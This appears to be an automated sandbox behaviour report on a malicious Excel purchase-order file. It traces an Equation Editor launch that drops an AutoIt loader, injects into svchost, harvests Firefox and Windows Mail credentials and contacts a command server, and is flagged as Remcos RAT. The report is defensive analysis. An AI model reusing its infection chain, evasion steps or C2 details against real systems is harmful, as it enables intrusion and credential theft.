Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: PO-00006799868.xls	Stream path 'MBD0043CF7E/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: PO-00006799868.xls	Stream path 'Workbook' entropy: 7.9987777032 (max. 8.0)
Source: 68730000.0.dr	Stream path 'MBD0043CF7E/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: 68730000.0.dr	Stream path 'Workbook' entropy: 7.99889335374 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\directory\name.exe

API/Special instruction interceptor: Address: B3244

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 565			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 9412			Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	API coverage: 6.9 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.9 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3192	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464	Thread sleep count: 565 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464	Thread sleep time: -1695000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2120	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464	Thread sleep count: 9412 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464	Thread sleep time: -28236000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2180	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0021449B GetFileAttributesW,FindFirstFileW,FindClose,	10_2_0021449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0021C75D FindFirstFileW,FindClose,	10_2_0021C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_0021C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_0021C7E8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C449B GetFileAttributesW,FindFirstFileW,FindClose,	11_2_012C449B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CC75D FindFirstFileW,FindClose,	11_2_012CC75D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_012CC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_012CF17E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_012CF021
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_012CF47F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_012C3833
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012C3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_012C3B56
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012CBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_012CBD48

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_001B4AFE

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node			graph_11-97577
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node			graph_11-97676

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0022401F BlockInput,

10_2_0022401F

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_001B3B4C

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 11_2_01295BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

11_2_01295BFC

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0022C104 LoadLibraryA,GetProcAddress,

10_2_0022C104

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_000B34B0 mov eax, dword ptr fs:[00000030h]	11_2_000B34B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_000B3510 mov eax, dword ptr fs:[00000030h]	11_2_000B3510
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_000B1E70 mov eax, dword ptr fs:[00000030h]	11_2_000B1E70

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_002081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

10_2_002081D4

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001DA2A4 SetUnhandledExceptionFilter,	10_2_001DA2A4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001DA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_001DA2D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128A2A4 SetUnhandledExceptionFilter,	11_2_0128A2A4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0128A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0128A2D5

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.173.4.16 2404	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008			Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_00208A73 LogonUserW,

10_2_00208A73

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_001B3B4C

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

10_2_001B4A35

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_00214CFA mouse_event,

10_2_00214CFA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

10_2_002081D4

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_00214A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_00214A08

Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp, taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: taskhostw.exe, name.exe	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_3_02A77BAB cpuid

10_3_02A77BAB

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 11_2_01295007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

11_2_01295007

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001F215F GetUserNameW,

10_2_001F215F

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001E40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

10_2_001E40BA

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_001B4AFE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

Searches for Windows Mail specific files

Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

